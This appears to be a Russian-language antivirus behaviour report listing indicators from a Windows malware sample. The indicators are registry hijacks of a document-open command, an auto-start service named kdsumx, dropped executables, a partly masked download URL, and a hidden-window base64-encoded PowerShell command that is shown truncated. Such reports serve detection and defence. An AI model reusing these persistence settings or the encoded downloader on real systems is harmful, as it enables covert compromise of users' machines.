Техническая информация
- [<HKLM>\Software\Classes\Recalc.Document.1\shell\open\command] '' = '%HOMEPATH%\137.exe /dde'
- [<HKLM>\SOFTWARE\CLASSES\Recalc.Document.1\shell\open\command] '' = '<SYSTEM32>\kdsumx.exe /dde'
- [<HKLM>\System\CurrentControlSet\Services\kdsumx] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\kdsumx] 'ImagePath' = '"<SYSTEM32>\kdsumx.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAANgA3ADAAMgAzAHgANgA1AHgANQA3AD0AJwBjADMANgA4ADAAYgBjADAAMABjADAAMwB4ACcAOwAkAGMAMAB4ADYAYwA...
- %HOMEPATH%\137.exe
- %HOMEPATH%\137.exe в <SYSTEM32>\kdsumx.exe
- http://ma###pai.com/wp-admin/lb8232/
- DNS ASK ma###pai.com
- '%HOMEPATH%\137.exe'
- '<SYSTEM32>\kdsumx.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAANgA3ADAAMgAzAHgANgA1AHgANQA3AD0AJwBjADMANgA4ADAAYgBjADAAMABjADAAMwB4ACcAOwAkAGMAMAB4ADYAYwA...' (со скрытым окном)
- '<SYSTEM32>\werfault.exe' -u -p 1036 -s 172' (со скрытым окном)